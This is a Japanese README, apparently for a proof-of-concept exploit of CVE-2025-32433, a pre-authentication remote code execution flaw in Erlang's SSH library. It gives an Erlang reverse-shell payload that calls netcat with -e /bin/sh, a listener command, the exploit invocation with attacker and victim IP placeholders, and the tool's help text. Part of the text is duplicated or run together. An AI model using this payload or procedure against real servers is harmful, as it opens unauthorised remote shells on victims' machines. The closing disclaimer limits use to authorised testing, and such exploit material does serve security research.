
CVE-2025-32433 の概念実証エクスプロイトは、Erlang の SSH ライブラリにおける深刻な脆弱性であり、不正な SSH_MSG_CHANNEL_REQUEST パケットを介して認証前のコード実行を可能にします。
CVE-2025-32433 の概念実証エクスプロイトです。これはErlangのSSHライブラリにおける深刻な脆弱性であり、不正な SSH_MSG_CHANNEL_REQUEST パケットによって認証前のコード実行を可能にします。
argparse によるビルトインのヘルプと使用方法os:cmd("nc LHOST LPORT -e /bin/sh"). を使用した Erlang 形式のリバースシェルペイロードnc(Netcat)リスナー22)へのネットワークアクセス攻撃ボックスでリスナーを起動します:
nc -lvnp 4444
エクスプロイトを実行します:
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
シェルがリスナーに接続してくるのを待ちます。
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
このコードは、自分が所有している、または明示的なテスト許可を得ているシステム上でのみ使用してください。脆弱性の不正な悪用は違法であり、非倫理的です。